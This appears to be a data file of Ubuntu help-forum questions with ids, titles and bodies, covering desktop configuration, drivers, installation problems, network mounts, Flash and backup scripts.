108436	is it necessary to monitor cron/anacron ?	i use ubuntu at home for my personal matters , not as a `` server '' . i shut down my computer two or three times a day and there are n't any fixed usage times . i understand that there are automated tasks set to run at particular times of the day , week or month and that cron and anacron are involved . apart from not having a regular usage schedule , i 'm also blessed with an imperfect internet connection . how can i know whether the various tasks , such as maintenance or updating ubuntu 's databases , are being satisfactorily completed ? i came across which logs should i pay attention to ? which referred to /var/log/crond.log but i do n't have such a log nor even a log with `` anacron '' in the name . i keep up with all software updates by running apt-get update and apt-get upgrade more than once a day and accept all updates . i do n't have any performance issues that i know of .
108440	i want to map keypresses onto shortcuts in lubuntu , but xev 's output confuses me	i 'm using a toshiba r835 with lubuntu . after a clean install , pressing the power button while the machine is on does nothing . i fixed the power button by following this advice : i added these lines to ~/.config/openbox/lubuntu-rc.xml < keybind key= '' xf86poweroff '' > < action name= '' execute '' > < command > lubuntu-logout < /command > < /action > < /keybind > this makes sense to me . i want to map several other keys to similar shortcuts . for example , when i press fn-f1 , i want to lock the screen . i imagine i would add something like < keybind key= '' xf86screensaver '' > < action name= '' execute '' > < command > xscreensaver-command -lock < /command > < /action > < /keybind > however , when i press fn-f1 , it opens the lubuntu menu , as if i 'd pressed the super_l key . it also types the letter l if i have a terminal open . my desired shortcut xscreensaver-command -lock seems to be ignored . what 's going on ? why is n't my shortcut working ? i thought i could figure this out with xev , but the output of xev confuses me : focusout event , serial 41 , synthetic no , window 0x2000001 , mode notifygrab , detail notifyancestor focusin event , serial 41 , synthetic no , window 0x2000001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 41 , synthetic no , window 0x0 , keys : 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 mappingnotify event , serial 41 , synthetic no , window 0x0 , request mappingkeyboard , first_keycode 8 , count 248 keypress event , serial 41 , synthetic no , window 0x2000001 , root 0xae , subw 0x0 , time 16525549 , ( 289 , -138 ) , root : ( 341,155 ) , state 0x40 , keycode 160 ( keysym 0x1008ff2d , xf86screensaver ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false keyrelease event , serial 41 , synthetic no , window 0x2000001 , root 0xae , subw 0x0 , time 16525550 , ( 289 , -138 ) , root : ( 341,155 ) , state 0x40 , keycode 160 ( keysym 0x1008ff2d , xf86screensaver ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false mappingnotify event , serial 42 , synthetic no , window 0x0 , request mappingkeyboard , first_keycode 8 , count 248 keyrelease event , serial 42 , synthetic no , window 0x2000001 , root 0xae , subw 0x0 , time 16525639 , ( 289 , -138 ) , root : ( 341,155 ) , state 0x40 , keycode 46 ( keysym 0x6c , l ) , same_screen yes , xlookupstring gives 1 bytes : ( 6c ) `` l '' xfilterevent returns : false keyrelease event , serial 43 , synthetic no , window 0x2000001 , root 0xae , subw 0x0 , time 16525646 , ( 289 , -138 ) , root : ( 341,155 ) , state 0x40 , keycode 133 ( keysym 0xffeb , super_l ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false it looks like i 'm getting keycode 160 , which i think is xf86screensaver , but it 's also as if i 've pressed the super_l key and the l key . i think all this output comes from the one fn-f1 keypress . this confuses me . how can i get fn-f1 to lock the screen instead of opening the lubuntu menu and typing the letter 'l ' ?
108441	`` screen-reader tool orca '' and extendable/customizable functionality in ubuntu ?	here is what i want to do : i want to put/run orca as an idle process in background after booting into ubuntu . ( no problem there so far . ) now when i open up a text file or website in my [ web ] browser ; i want to be able , to highlight text and use a keyboard-shortcut in order to invoke orca process [ see step 1 ] , to read the selected text back to me . my problem is , that orca , once initialized as a running process permanently reads back everything , from mouse-over actions of buttons , to system related actions etc.. and orca-preferences does n't come with options , to reduce and suppress this . orca might not be the right application at all for this and a common speech-synthesis application might be even better . if someone knows how to make it work that way , please help . an alternative speech-synthesis `` read back '' option/function , like apple offers in os x would even be better , since there one can simply `` selected text '' , that is invoked with ctrl+ # shortcut , or simply use say , or for text files say -f ~/input.txt -o ~/output.aiff-command to have text red back instantly !
108442	make the sound louder in lubuntu	i have a toshiba r835 running lubuntu 11.10 . turning the volume slider up all the way does n't give very loud sound . i 've tried typing alsamixer in a terminal and turning up all the levels there to maximum , but the speakers are still fairly quiet . is there a simple way to increase maximum volume in software ? i understand that there are physical limits to the sound the laptop 's speakers can produce , but i suspect my maximum volume is limited by software . edit : this is exactly the type of solution i 'm looking for . however , it does n't work for me . what i did : sudo pico /etc/asound.conf this file does not exist , so i create a new one , containing : pcm . ! default { type plug slave.pcm `` softvol '' } pcm.softvol { type softvol slave { pcm `` dmix '' } control { name `` pre-amp '' card 0 } min_db -5.0 max_db 20.0 resolution 6 } i reboot the machine , and type alsamixer . i use my left/right arrow keys to inspect the various volume options . i expect to see a new option , called pre-amp , but i do n't see one . this fix seems to work for other people . why does n't this fix work for me ?
108445	facebook videos do n't work	hello everybody i have ubuntu 11.10 since updated my firefox to version 10 i ca n't play videos through facebook but the videos work fine on youtube also the videos work fine on chrome ( facebook and youtube ) , i tried to remove firefox and install it again and install flash plugin , but the problem persist how can i solve that ?
108446	how do i configure two nics in ubuntu-server preseed ?	i have a script that installs ubuntu server to a new virtualbox instance via pxe and preseeding . so far it is working great , i can run a complete install and come out with a fresh machine with one network card . how do i make the preseeded installation configure two or more network cards ? it 's not clear that d-i netcfg/choose_interface will let me specify two devices . likewise , hacking on /etc/network/interfaces inside a d-i preseed/late_command is defeating me ( i think perhaps i 'm bungling the escapes . ) what 's the `` right '' way to do this ?
108455	wrong detection of graphics hardware	i have a vaio vpcea23en laptop with ati radeon h 5145 graphics but when i installed the drivers from additional hardware ( proprietory drivers ) its showing it as ati radeon hd 4500 . video quality is also not as good as that when i play the same video in vlc in windows 7 .
108456	error in installing gocr	when i tried to install gocr on ubuntu linux 11.10 i got the following readout in the terminal ? ? ? ? ? ? ? ? ? ? : ~ $ cd gocr-0.48 ; make install ./configure checking for gcc ... gcc checking for c compiler default output file name ... a.out checking whether the c compiler works ... yes checking whether we are cross compiling ... no checking for suffix of executables ... checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept ansi c ... none needed checking for a bsd-compatible install ... /usr/bin/install -c checking whether make sets $ ( make ) ... yes checking for library containing pnm_readpnminit ... no * * * try option -- with-netpbm=path checking how to run the c preprocessor ... gcc -e checking for egrep ... grep -e checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking for unistd.h ... ( cached ) yes checking wchar.h usability ... yes checking wchar.h presence ... yes checking for wchar.h ... yes checking for an ansi c-conforming const ... yes checking for function prototypes ... yes checking whether setvbuf arguments are reversed ... no checking for wcschr ... yes checking for wcsdup ... yes checking for gettimeofday ... yes checking for popen ... yes configure : creating ./config.status config.status : creating makefile config.status : creating src/makefile config.status : creating doc/makefile config.status : creating man/makefile config.status : creating include/config.h make -c src install make [ 1 ] : entering directory `/home/drew/gocr-0.48/src' gcc -g -o2 -i../include -dhave_config_h -c -o pgm2asc.o pgm2asc.c gcc -g -o2 -i../include -dhave_config_h -c -o box.o box.c gcc -g -o2 -i../include -dhave_config_h -c -o database.o database.c database.c : in function ‘ocr_db’ : database.c:411:10 : warning : ignoring return value of ‘fgets’ , declared with attribute warn_unused_result [ -wunused-result ] gcc -g -o2 -i../include -dhave_config_h -c -o detect.o detect.c gcc -g -o2 -i../include -dhave_config_h -c -o barcode.o barcode.c gcc -g -o2 -i../include -dhave_config_h -c -o lines.o lines.c gcc -g -o2 -i../include -dhave_config_h -c -o list.o list.c gcc -g -o2 -i../include -dhave_config_h -c -o ocr0.o ocr0.c gcc -g -o2 -i../include -dhave_config_h -c -o ocr0n.o ocr0n.c gcc -g -o2 -i../include -dhave_config_h -c -o ocr1.o ocr1.c gcc -g -o2 -i../include -dhave_config_h -c -o otsu.o otsu.c gcc -g -o2 -i../include -dhave_config_h -c -o output.o output.c gcc -g -o2 -i../include -dhave_config_h -c -o pixel.o pixel.c gcc -g -o2 -i../include -dhave_config_h -c -o unicode.o unicode.c gcc -g -o2 -i../include -dhave_config_h -c -o remove.o remove.c gcc -g -o2 -i../include -dhave_config_h -c -o pnm.o pnm.c gcc -g -o2 -i../include -dhave_config_h -c -o pcx.o pcx.c gcc -g -o2 -i../include -dhave_config_h -c -o progress.o progress.c gcc -g -o2 -i../include -dhave_config_h -c -o job.o job.c gcc -g -o2 -i../include -dhave_config_h -c -o gocr.o gocr.c # make it conform to ld -- as-needed # gcc -o gocr -lm gocr.o ./libpgm2asc.a gcc -o gocr -lm gocr.o pgm2asc.o box.o database.o detect.o barcode.o lines.o list.o ocr0.o ocr0n.o ocr1.o otsu.o output.o pixel.o unicode.o remove.o pnm.o pcx.o progress.o job.o if test -r gocr ; then cp gocr ../bin ; fi # /usr/bin/install -c -d /usr/local/bin /usr/local /usr/local /usr/bin/install -c -d /usr/local/bin /usr/bin/install -c ../bin/gocr /usr/local/bin /usr/bin/install : can not create regular file `/usr/local/bin/gocr ' : permission denied make [ 1 ] : *** [ install ] error 1 make [ 1 ] : leaving directory `/home/drew/gocr-0.48/src' make : *** [ install ] error 2 can anyone help me in correcting this . i had it working in 10.04 thanks drew
108459	what graphics cards will work with an intel 945gcpe motherboard	i want to upgrade my graphics card but my mother is intel 945gcpe .i dont know which graphics cards that motherboard will support . so i want to know which graphics card it will support .
108462	mount - unable to find suitable address	i am trying to mount my windows share through my ubuntu box ( no xwindow ) , but i continue to get unable to find suitable address i have tried using the raw ip address , i have checked the credentials , i have disabled the windows firewall , but i can not find anything wrong . benny @ backup : ~ $ sudo mount -t cifs //my-desk/j -o username=me , password=s ) mepasss /mnt/sync unable to find suitable address . benny @ backup : ~ $ ping my-desk ping my-desk ( 10.10.10.43 ) 56 ( 84 ) bytes of data . âľ -- - my-desk ping statistics -- - 2 packets transmitted , 0 received , 100 % packet loss , time 1008ms benny @ backup : ~ $ sudo mount -t cifs //10.10.10.43/j -o username=me , password=s ) mepasss /mnt/sync unable to find suitable address . any help would be greatly appreciated !
108468	move downloaded files based on criteria	after downloading tv shows and movies i would like them to be automatically moved to two separate folders ( named `` tv shows '' and `` movies '' ) . i know there are a lot of programs that you can do this with on windows / osx but i am not sure about ubuntu . if there are not any for ubuntu would it be possible to make some sort of script myself ? the simplest criteria that i thought of would be to sort video files over 1 hour in length to the movies folder that way it would be fully automatic . i could always make a comment on the torrent such as `` movie '' and then read that with a script maybe ? any tips would be really appreciated , thanks !
108470	how do i install 2 versions of ubuntu on the same computer using wubi ?	i 've installed ubuntu 10.10 version using wubi on my windows xp pc . now i want to install ubuntu 11.10 using wubi ( it 's easy and can copy entire root disk as a backup ) . is there a way to install this 11.10 with wubi without damaging the existing 10.10 wubi installation ? i already tried replacing the 11.10 root disk with 10.10 disk and reboot to 11.10 , but it 's a waste of time . i am using ubuntu since 10.10 version and do not want to kill 10.10 .
108476	my iphone 3gs fails to connect with my laptop ( hp pavilion entertainment pc ) , nothing happens , i m using widows 7 my ios is 4.1	as pc doesnt seems to have my iphone connected , my phone doesnt start charging , i mean nothing happen/.i m new with all this .please help me out . iwant to make backup in my pc.i dont know except basics of iphone , yet i want to make it worthe firmware is 4.1 ( 8b117 ) .iwant to upgrade it.i uses wifi sync but it also worked once.no gain.suggest me an appropriate solution.with detail.as i m new n layman.dont know very much but little like using cydia , ifile , itunes , ssh.please help me out with my iphone 3gs n itunes on my pc .wifi sync also doesnt work as it fails to recognizes my pc on my iphone 3gs
108478	how to install peazip on ubuntu ?	i want to install peazip for a specific purpose , which i ca n't fulfill with any other archive manager . i downloaded and installed it by using both dpkg -i & gdebi . now i ca n't start it , because i ca n't find the launcher . please provide a solution .
108479	can i use the same built in flash library from chrome in firefox ?	chrome comes with flash support by default , firefox does not . if i use both on my system is there a way to use the library responsible displaying flash content in chrome to do the same in firefox ?
108493	adobe flash .sol location	i 've looked around the internet for a while and this forum/place and still ca n't find an answer . so , i decided to register and ask the question . i 'm looking for the location of .sols when you play flash games . usually in windows oss they 're located in the c : \users\documents & settings\username\appdata\shared objects\macromedia\code\here ( or similar ) but i 've been looking around and ca n't find the location of the file . the reason being is i want to move my flash game files from a windows pc to my ubuntu and play them . my only [ temporary ] solution is to get a windows vm , but that 's laggy as it 's an old pc . any solutions or answers are very welcome ^^ edit : thanks i 'll try the solutions soon .
108494	clementine stopped playing music	i 'm using kubuntu 11.10 . clementine worked great until i had my laptop lag for , most likely , some flash player error . i had to manually kill firefox and clementine , but upon restart , clementine does not play any sound anymore . terminal output does n't show any error , and the track seemingly is playing , as the `` seconds tick '' and i receive regular track notifications . the clementine volume bar shows and responds in the sound menu . rhythmbox plays files regularly and so do vlc and flash . i already tried deleting the gstreamer folder to force a regeneration but to no avail . i 'm at a loss , any help appreciated !
108496	ubuntu installation on toshiba qosmio x770	i am trying to install the last ubuntu version on my laptop but i could not make it because the installation process freeze and do n't let me go on . i got a toshiba qosmio x770 and i would like to use ubuntu , but might be not compatible , please can you help me ?
108505	how do i install ubuntu 11.10 on an acer travelmate 240	so far i have downloaded ubuntu 11.10 and created both a stick and a dvd , but i cant get the system ( acer travelmate 240 ) to boot from either . of course i have changed the system bootmenu to do so . also i cant install from wubi . it simply stops with a backend error . any ideas ...
108509	installation of ubuntu 11.10	i have created several iso s from the ubuntu download page.i have made a couple 64 bits as well as 32.everytime i burn this iso and install onto my computer i pretty much on ly get the option to run it beside windows.i am trying to get it to replace windows completely but that option isnt there.i have used infrarecorder and the other one it recommended on the site as well.when i put the cd in i have the option to run wubi installer or view files.when i open the view files tab it seems that all files are there i think.i ve tried this with cd and dvd to burn.am i doing something wrong in the burn phase ? i ve burned iso images before and they have always worked .
108512	i cant install gnome classic or the shell one	sudo apt-get install gnome-shell reading package lists ... done building dependency tree reading state information ... done package gnome-shell is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'gnome-shell ' has no installation candidate same message over and over , this is a fresh install
108515	ca n't write /etc/sudoers from ubuntu live cd	i messed up the /etc/sudoers file , now i need to restore it . booted up the system with an ubuntu live cd , installed lvm and mounted the volume . i 'm root and i ca n't write to the sudoers file in my mounted hd . i ca n't change the permission with chmod because system tell me it 's a read-only file system . what should i do ?
108520	can chromium browser 's permissions facilitate a root kit exploit ?	i 'm just learning about permissions and excuse me if i may have gone astray . but , i 've noticed that chromium browser has a sandbox executable that is owned by root and has it 's user id set to launch as root . manager @ internet /usr/lib/chromium-browser $ ls -l total 63836 -rw-r -- r -- 1 root root 3093552 2012-02-21 01:41 chrome.pak -rwxr-xr-x 1 root root 56785884 2012-02-21 02:09 chromium-browser -rwsr-xr-x 1 root root 13636 2012-02-21 02:09 chromium-browser-sandbox -rw-r -- r -- 1 root root 15 2012-02-21 01:36 content_resources.pak -rw-r -- r -- 1 root root 1629044 2012-02-21 02:09 libffmpegsumo.so drwxr-xr-x 2 root root 1160 2012-02-28 07:30 locales drwxr-xr-x 2 root root 40 2012-02-21 02:05 plugins -rw-r -- r -- 1 root root 3669791 2012-02-21 01:42 resources.pak -rwxr-xr-x 1 root root 37394 2012-02-15 15:35 xdg-mime -rwxr-xr-x 1 root root 33273 2012-02-15 15:35 xdg-settings it is my understanding this is a dangerous situation . is it not possible this may lead to an exploit as a root kit ? why should a browser be launching with root id ?
108522	how to use custom icon in an appindicator ?	this question has already which icon names you can pass to the set_icon_full ( set_icon is deprecated if someone is wondering ) , but i could n't find ressources of how to set a custom icon from a file coming with the application ? is it generally recommended ( because icons shipped with the application wo n't change with icon theme ) ? how to accomplish it ?
108528	how do you revert the control keys back to `` normal '' operation ?	dell desktop , logitech wireless keyboard , ubuntu 11.10 . yesterday my right and left control keys got ( re/un ) mapped , but i 'm not sure by what . now , whenever i press either one , a red `` pulsating '' red circle flashes under the pointer and then returns to normal . in ubuntu this is the only sign that something has changed . however , in virtualbox with a windows guest , nothing that uses the control key will work . i 'm not sure what changed it or where to look for how to change it back .
108529	autochange user passwords on boot	i 'm trying to increase the security of a remaster distro meant to be ran live and used online . to avoid tempting the user into : not changing their password not creating a new password , or using an auto login user i 'm changing the password at the gdm and creating a popup window that gives the passwords to the user to sign in . at this point in time , this is what is what is going on : passwords sometimes successfully changed . some user passwords are changed , others not old passwords are never left , so if the passwords are not changed successfully , then there is a lock out , reboot needed what can i do to the start up script to ensure the passwords are definitely changed ? password python code call , for the user manager : os.system ( `` usermod -p `mkpasswd -h md5 `` + managerpassword + `` ` manager '' ) startup script : # create new passwords at login task # the following `` start on '' from gdm.conf , has helped , but not solved start on ( filesystem and started dbus and ( drm-device-added card0 primary_device_for_display=1 or stopped udevtrigger ) ) or initpasswd script python /initpasswd/initpasswd-sleep.py # a little sleep has helped , not solved python /initpasswd/initpasswd.py # password reset script echo `` '' > /initpasswd/initpasswd.py # so it resets only once at gdm per boot end script
108530	what tools do i need to install for java development ?	i am newbie to ubuntu and i need to install tools for java development on that platform . i see by the ubuntu software center that i have this installed : openjdk java 6 runtime icedtea java 6 web start netbeans platform for building rich media desktop app in java openjdk java runtime , using hotspot jit ( headless ) what other stuff do i need to install to develop java and java mobile apps ? thanks .
108533	dockbarx/awn preview is empty	i 'm using the following components in xubuntu 11.10 : awn ( 0.4.1 ) dockbarx ( 0.48 ) awn-applet-dockbarx ( 0.48 ) i activated the `` dockbarx previews '' in the `` dockbarx preferences '' . however the previews are always empty . this means that the space which is reserved for the preview windows is showing up on mouse over but it 's empty and i can only see the underlying window or desktop . thanks in advance !
108534	grub can not load my newly installed kernel	i needed a minimally-configured real time kernel , i compiled a new kernel with menuconfig . firstly i added the rt patch to the new kernel directory using patch , and then ran make menuconfig . then i added the bzimage find inside arch/x86/boot/bzimage and the system.map files to /boot . after that i ran update-grub . here are the contents of my grub.cfg the problem is the the new kernel can not be loaded when grub prompts .
108535	bluetooth wo n't pair xubuntu 11.10	i 'm running a lenovo thinkcentre m55e running xubuntu 11.10 , i bought a bluetooth adapter dongle . inserted dongle into usb and it recognizes it but it wo n't ' pair `` with my phone . i used this same method @ work on my thinkcentre with xp on it and it worked no problem . used the same passcodes on both machines . any thoughts ?
108538	ubuntu 11.10 restart and shutdown not working fully	i have installed ubuntu 11.10 on an asus p8z68 v-pro motherboard which is a uefi bios . the install seems to have worked fine except for one thing , when restarting or shutting down it gets stuck at the asus bios boot screen when starting up again ( or blank screen if turning off the bios flash screen ) . this means i have to hold down the power button to turn it off and then back on again which boots ubuntu fine . i have read a lot of the other questions and answers here and dont seem to find a problem/solution that matches this exactly . i have ubuntu installed on a ssd and then have 2x2tb sata disks in a raid 1 array through intel storage technology and using dmraid to show the raid in ubuntu . looking at the details for the disks in gparted , all the disks have an msdos partition table , and from what i can see there is not a efi partition created . i really dont want to have to reinstall everything if possible as its working well except for the restart glitch . what things can i try to fix this problem or at least debug it ( as it doesnt seem to even reach grub ) ? update : i was sure this was a problem with the drive being a msdos partition table assuming that the efi had not installed at all ( i had a win7 installation on it previously so i wiped that with gparted before installing and must have put on a msdos partition table then ) . so i reinstalled ubuntu with a usb install after wiping the ssd drive and setting it to gpt partition table . this correctly installed a fat16 efi partition at the beginning and i though everything was going to be rosey . however , it still seems there is a problem with reboot and shutdown except now it doesnt even show the bios splash , just a black screen with no prompt or anything .
108551	i have a small ssd hard drive , can i view/edit/add files in my folder system without storing them locally ?	since i have limited space on my computer i would like to store the files on the ubuntu one cloud and not locally on my ssd . but it is a hassle to edit/add/view files through my web browser on one.ubuntu.com . in a way i want a ubuntu one folder on my computer that acts like an external hdd . is this possible with ubuntu one ? or will it be added as a feature in the future ? i use ubuntu one both on ubuntu and windows operating systems .
108552	open port 5000 ?	yesterday i tried to use this heroku command : heroku run db : migrate and after a long wait it said that it was in timeout after many tries i 've googled about this and i found that , since also other commands have given the same response , the problem was that my pc ( or my net ? ) has n't the port 5000 open . can i open this ? how in ubuntu ? if it is releated to my providere i read somewhere that probably i can whitelist this port : can i do this from ubuntu ? how ?
108553	how do i limit a ubuntu machine to a python gui ?	i wrote a python gui in tkinter for a time-clock system . the micro machine is wall mounted and the employees only have access to the touchscreen menu i programmed and a barcode swipe . i know how to get the script to start on startup , but how do i prevent them from exiting out or opening other menus ? basically the sole purpose of this console is to run the time-clock gui .
108555	nvidia geforce 8500gt + old monitor = low resolution	so i 've just installed ubuntu 11.10 on my old pc . it has an nvidia 8500gt , and the desktop monitor is pretty old though ; like 1998 old . i have installed the drivers using this guide : how-to-install-nvidia-2750907-driver at mygeekopinions.blogspot.com it 's a crt monitor . philips 201b4 . i guess that 's the problem . could you help me get 1280by1024 or something ? thanks xorg.conf section `` device '' identifier `` default device '' option `` nologo '' `` true '' endsection xrandr -q xrandr : failed to get size of gamma for output default screen 0 : minimum 320 x 240 , current 640 x 480 , maximum 640 x 480 default connected 640x480+0+0 0mm x 0mm 640x480 50.0* 320x240 51.0
108572	i had a bunch of notes in my account . where did they go ?	had a bunch of notes synced originally from tomboy . i still see pics that were attached , but i do n't see the content of those notes any longer .
108578	how to increase the size of a loop device ?	i have a loop device that came pre-installed on my computer . it is mounted atop a ntfs filesystem in the root folder . i heard it increases the performance of ubuntu . now the problem is it does n't have much space , only 5 gb . is there a way to increase his size ? or do you think i should delete it ? how can i do it ? thanks in advance
108580	how can i make my ubuntu 11.10 use less of my memory and processor ?	i have a computer with a celeron 1.6 ghz processor and 512 mb ​​ddr2 ram , and i love this distribution of linux , so i would like to know if there is some way or maybe a program that can make ubuntu more lighter .
108585	help required to install an nvidia gt520 card into 11.10	i 'm a total newbie with ubuntu , installed windows and built pcs numerous times over the years , but this o/s is utterly new to me . i am trying to install ubuntu 11.10 64-bit with a nvidia/asus gt520 graphics card . i can get as far as 11.10 & the proprietary drivers installed but i can only see the flatscreen on the dvi cable , the plasma screen on the vga cable remains off . in the system tools folder the icon about displays is only showing the dell screen as connected , if i click 'detect displays ' the vga is not detected . if i swap the hard drive with one containing win xp o/s the screens are fine , so i assume the hardware is ok . ultimately what i want is to use the extended desktop/workspace across the 2 screens as i can do in xp . could someone help correct this problem . please do it step by step , this is a new o/s to me and it 's a bit bewildering . copied from belarc advisor : motherboard : gigabyte ga-a75m-d2h - bus clock : 100 megahertz 3.00 gigahertz amd a8-3870 apu with radeon hd graphics 256 kilobyte primary memory cache 1024 kilobyte tertiary memory cache 64-bit ready multi-core ( 4 total ) nvidia/asus gt520 graphics card with plasma screen on vga cable and dell flatscreen on dvi cable .
108587	how do i disable touchpad 's copy & paste & right-click functionality ?	on ubuntu 11.10 , with unity desktop : tapping top-right corner of the touchpad triggers 'paste' tapping top-left corner = > 'copy' tapping bottom-right corner = > 'right-click' ( i 've discovered this through experiments ) . obviously , that 's intentional . there must be settings for that . i 've looked through settings- > mouse & compiz settings manager but failed . how do i disable these triggers ?
108588	should dconf-service start at boot ?	i 've recently had some problems when i tried to install the latest gnome-shell and then revert back to the stable version . after i purged all the ppas that i was using and reinstalled gnome-shell and everything , i found that things still were n't working quite right . i found somewhere online ( obviously a reputable source ) that deleting my dconf config files from ~/.config/dconf/ and ~/.cache/dconf/ and then rebooting would help . while that did reset all my gnome-shell settings back to initial ( like i wanted ) , i discovered another problem in that i could not change any settings on my system , via gnome-tweak-tool , system settings , or dconf-editor . i would receive an error message of : warning ** : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name ca.desrt.dconf was not provided by any .service files after much googling and fiddling , i was able to figure out that i could change settings if i ran /usr/lib/d-conf/dconf-service & and then changed all my settings while it was running . i have two questions : would anyone know why something like this would happen ( and is there anything i can do to fix it ? and is it terrible to add /usr/lib/d-conf/dconf-service/ to my startup applications so i 'm able to change settings while using my computer day-to-day ? this is really just a workaround , but i want to know if it 's safe . thanks !
108591	reorganize indicators in unity	i just want to move the weather indicator close to the calendar one . in the new unity there 's no way of moving the indicators like in the older version . is there even possible ? if so , how ?
108593	how to increase the size of lxpanel in lubuntu ?	somebody that 's visually impaired finds the icons on the panel very small . i 'd like to increase the size of the panel .
108600	how does ubuntu know what file type a file without extension is ?	as the question goes , how does ubuntu know what file type a file without extension is ? when i save a file as `` untitled document '' without any extension , how does it know ? same thing for video and music formats ...
108601	command line suspend for a pre-determined amount of time	how can i suspend from the command line for a pre-determined amount of time ? for example , in the terminal i can do `` pm-suspend '' , and that suspends the computer . but i want the computer to come out of this suspend a couple of days later , on its own , and i do n't know how to do that .
108603	error message on ubuntu software center `` there is n't a software package called `` corebreach '' in your current software sources . ''	when i open the ubuntu software center and i try to install the game corebreach by clicking on the ubuntu software center on-top banner i get the message : `` there is n't a software package called `` corebreach '' in your current software sources . '' this is how my software sources screen look like :
108609	kinect for ubuntu users	i have a few questions relating to microsoft 's kinect or similar motion detection device with comparable quality ( further only kinect ) and ubuntu : is there a way to use kinect controllers with ubuntu ? if so , is there any way to play games with kinect on ubuntu ? where can i find more information on how to configure games to use kinect controllers , or development efforts for input drivers or games that support kinect controllers ?
108612	discovering people connected on hub network	sorry , i 'm really newbie on ubuntu matters . is there a way of discovering everyone connected on a hub with wireless network ( ip and name ) ?
108615	remap ctrl+pageup , ctrl+pagedown ( switch tabs in gnome )	in gnome-shell , if you do ctrl+page down , you can switch to the previous tab . however , when i 'm on a laptop , there are no page down and page up keys . so , i would like to map this key combination to something like alt+ { and alt+ } . i have tried doing this in the system settings of gnome-shell , under the custom shortcuts . i set the command to be run as xdotool key ctrl+prior and xdotool key ctrl+next . if i run this command at a terminal prompt , this switches the tabs as expected . however , doing it as a keyboard shortcut , it appears it never runs xdotool . i have also tried doing this with xbindkeys , but it just seems like it 's not running xdotool . is there a better way to map these keys in gnome-shell ?
108620	where is ubuntu-11.10-desktop-i386	i accidentally downloaded the server version of 11.10 but need the client desktop version to run on my windows machine . i already have a vmware player . but , i just cant seem to find it on download area . i saw ubuntu-11.10-desktop-i386.iso.torrent but i dont think that 's the one . thnx
108627	command line backup of my dvd	i am trying to follow the directions to create an automated backup from this site for my 11.10 machine : http : //ubuntuforums.org/showthread.php ? t=363666 the dvd that i 'm working with is a memorex dvd-rw 4x 4.7gb 10min . i have written the following script : # /bin/bash dvd=/dev/scd0 outfile=/var/log/burn-backup.log echo > $ outfile echo formatting $ dvd ... |tee $ outfile dvd+rw-format -force=full $ dvd|tee $ outfile echo writing $ dvd ... |tee $ outfile growisofs -dvd-compat -input-charset=iso-8859-1 -z $ dvd -r -j -pad -graft-points `` /spenser=/mnt/backup '' eject and here are my results : thom @ thom-desktop : /usr/local/bin $ sudo burn-backup.sh formatting /dev/scd0 ... * bd/dvd±rw/-ram format utility by < appro @ fy.chalmers.se > , version 7.1. : - ( mounted media does n't appear to be dvd±rw , dvd-ram or blu-ray writing /dev/scd0 ... : - ( /dev/scd0 : media is not recognized as recordable dvd : 0 i 'm at a loss as to how to proceed ... thanks .
108632	minimum brightness level too bright/high on an asus ul-50	the minimum brightness level is too bright for me . i did take a look at the following post : decrease backlight below minimum but the solution mentioned did not work for me . before using ubuntu , i tried linux mint , and was able to adjust my screen brightness much lower . i do have the brightness app installed on my toolbar , but even at the minimum setting , it is too bright/high . any help would be deeply appreciated . a linux newbie
108633	why does n't ubuntu nvidia-current support the later proprietary drivers for lts releases ?	e.g . in my lucid 10.04 lts system i had to uninstall the ubuntu proprietary drivers and manually install drivers from nvidia.com for an upgraded video adapter to get the system to work . this does not seem to be in agreement with ms 's policy or with the ubuntu wiki '' nvidia-graphics-drivers '' versions published in ubuntuâś precise ( 295.20-0ubuntu1 ) : restricted/misc lucid-updates ( 195.36.24-0ubuntu1~10.04.1 ) : restricted/misc oneiric ( 280.13-0ubuntu6 ) : restricted/misc natty ( 270.41.06-0ubuntu1 ) : restricted/misc maverick ( 260.19.06-0ubuntu1 ) : restricted/misc lucid ( 195.36.15-0ubuntu2 ) : restricted/misc this list seems to be out of date , my maverick system has 295.20-0ubuntu1~maverick~xup1 installed . update : versions as of 17-oct-2012 quantal ( 304.51.really.304.43-0ubuntu1 ) : restricted/misc lucid-updates ( 195.36.24-0ubuntu1~10.04.3 ) : restricted/misc precise-updates ( 295.40-0ubuntu1.1 ) : restricted/misc oneiric-updates ( 280.13-0ubuntu6.2 ) : restricted/misc natty-updates ( 270.41.06-0ubuntu1.2 ) : restricted/misc lucid-security ( 195.36.24-0ubuntu1~10.04.3 ) : restricted/misc natty-security ( 270.41.06-0ubuntu1.2 ) : restricted/misc oneiric-security ( 280.13-0ubuntu6.2 ) : restricted/misc precise-security ( 295.40-0ubuntu1.1 ) : restricted/misc precise ( 295.40-0ubuntu1 ) : restricted/misc oneiric ( 280.13-0ubuntu6 ) : restricted/misc natty ( 270.41.06-0ubuntu1 ) : restricted/misc lucid ( 195.36.15-0ubuntu2 ) : restricted/misc
108634	how do i receive incoming google voice calls using empathy ?	i have a google voice number so i can receive phone calls dialed to an actual phone number when i 'm logged into gmail ( via the gtalk widget sidebar ) . i see i can use empathy to make voice calls with other gtalk users . is it possible that i can receive phone calls when logged into empathy , ie , that someone dial my google voice phone number , and it pops up as a call when i 'm logged into empathy , the same way it does in the gtalk sidebar widget ? ( currently , i route my gtalk calls to skype , but it would be even better if this worked seamlessly within empathy . )
108635	how can i be sure i am running the correct version of flashplayer ?	my firefox keeps reporting that i am running flash 10.3 , even though i am sure i installed 11.1 . how can i know for sure which version i am running , and that i am running the correct version ?
